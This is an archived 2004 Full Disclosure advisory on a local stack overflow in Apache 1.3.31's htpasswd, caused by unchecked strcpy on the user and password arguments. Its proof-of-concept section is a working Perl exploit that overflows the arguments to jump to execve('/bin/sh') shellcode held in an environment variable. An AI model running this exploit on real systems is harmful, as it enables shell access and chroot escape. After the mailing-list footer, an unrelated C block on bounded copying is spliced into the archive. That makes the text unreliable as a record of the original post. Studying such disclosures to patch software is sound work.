Full Disclosure mailing list archives
FlowSecurity.org: Local Stack Overflow on htpasswd apache 1.3.31 advisory.
From: Luiz Fernando <luiz.fc () gmail com>
Date: Thu, 16 Sep 2004 13:23:03 -0300
**********************************************************************************************
Flow Security
foxtrot () flowsecurity org
September 16th, 2004
Luiz Fernando Camargo
-----------------------------------------------------------------------------------------------------------------------------
Package Name: Apache htpasswd
Vendor URL: http://www.apache.org
Vendor Notified: Two months ago, but we got no answer.
Date: 2004-09-16
ID: FST-#0001
Affected Version: 1.3.31 and prior versions.
Risk: Execute arbitrary command, maybe evade apache chroot()
**********************************************************************************************

[01] Package Description
[02] The problem
[03] Possibilities
[04] Solution
[05] Proof of Concept
[06] Credits

[01] Short Description

Since htpasswd is part of apache software, here we got the apache description.

Apache has been the most popular web server on the Internet since April of 1996. The October 2003 Netcraft Web Server Survey found that more than 64% of the web sites on the Internet are using Apache, thus making it more widely used than all other web servers combined.

[02] The problem

In apache/src/support/htpasswd.c were found lots of problems with strcpy. Unchecked buffers with user and passwd variables may let an attacker take advantage of it.

[03] Possibilities

htpasswd is not setuid root by default. And it doesn't make any sense to do it yourself. So you can't gain root by exploiting these bugs directly. However, you can get out from apache's chroot environment since htpasswd usually stays in its environment.

[04] Solution

Take a good look at the strcpy functions and maybe change them for the strncpy function.

[05] Proof of Concept

-------cut-------cut-------cut-------cut-------cut-------cut-------cut-------cut-------cut-------
#!/usr/bin/perl
# Proof Of Concept exploit for htpasswd of Apache.
# Read the advisory for more information.
# - Luiz Fernando Camargo
# - foxtrot () flowsecurity org

$shellcode = "\x31\xdb\x6a\x17\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68".
             "\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

$target = "/usr/local/apache/bin/htpasswd";
$retaddr = 0xbffffffa - length($shellcode) - length($target);

print "using retaddr = 0x", sprintf('%lx',($retaddr)), "\r\n";

local($ENV{'XXX'}) = $shellcode;

$newret = pack('l', $retaddr);

$buffer = "A" x 272;
$buffer .= $newret x 4;
$buffer .= " ";
$buffer .= "B" x 290;

exec("$target -nb $buffer");
-------cut-------cut-------cut-------cut-------cut-------cut-------cut-------cut-------cut-------

[06] Credits

Jefferson Cachinel
Thyago Silva
Rodrigo Rubira Branco
Adriano Lima
Jardir
ph0enix

cheers,
Luiz Fernando Camargo
www.flowsecurity.org

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
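The advisory's solution section asks for bounded copies in place of strcpy. The C below is an added example, not the advisory's or Apache's code; it assumes a 256-byte fixed buffer (the name MAX_STRING_LEN and the size are assumptions, not taken from the advisory) and shows the bounded-copy replacement for the unchecked strcpy on user and password arguments, beside the strncpy pitfall a maintainer would want to avoid.

```c
#include <stddef.h>
#include <string.h>

/* Assumed buffer size: htpasswd copies user and password into fixed
 * buffers; the advisory does not give the constant, 256 is a guess. */
#define MAX_STRING_LEN 256

/* Scratch buffer used by the checks below (16 bytes to make edges visible). */
char scratch[16];

/* The bug class in the advisory: an unbounded strcpy into a fixed buffer,
 * so an argv string longer than dst writes past it. Shown for contrast only. */
void copy_unchecked(char *dst, const char *src) { strcpy(dst, src); }

/* Hardened replacement: measure first, refuse anything that does not fit
 * together with its NUL, then copy exactly n+1 bytes. 0 = ok, -1 = rejected. */
int copy_bounded(char *dst, size_t dstsize, const char *src)
{
    size_t n = strlen(src);
    if (dstsize == 0 || n >= dstsize)
        return -1;             /* refuse rather than silently truncate */
    memcpy(dst, src, n + 1);
    return 0;
}

/* Caveat for the "just use strncpy" fix: when src fills dst, strncpy writes
 * no NUL, so later string calls read off the end. 1 = left unterminated. */
int strncpy_leaves_unterminated(char *dst, size_t dstsize, const char *src)
{
    memset(dst, 'X', dstsize);
    strncpy(dst, src, dstsize);
    return memchr(dst, '\0', dstsize) == NULL;
}

/* What an htpasswd-style argument handler should do with one argv string:
 * 1 = accepted into the fixed buffer, 0 = rejected. */
int accept_credential(const char *arg)
{
    char buf[MAX_STRING_LEN];
    return copy_bounded(buf, sizeof buf, arg) == 0;
}

/* Test helper: an argument of len repeated characters, in the style of the
 * "A" x 272 input of the proof of concept. -1 = helper buffer too small. */
int accept_repeated(char c, size_t len)
{
    static char arg[1024];
    if (len >= sizeof arg)
        return -1;
    memset(arg, c, len);
    arg[len] = '\0';
    return accept_credential(arg);
}
```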
Current thread:
- FlowSecurity.org: Local Stack Overflow on htpasswd apache 1.3.31 advisory. Luiz Fernando (Sep 16)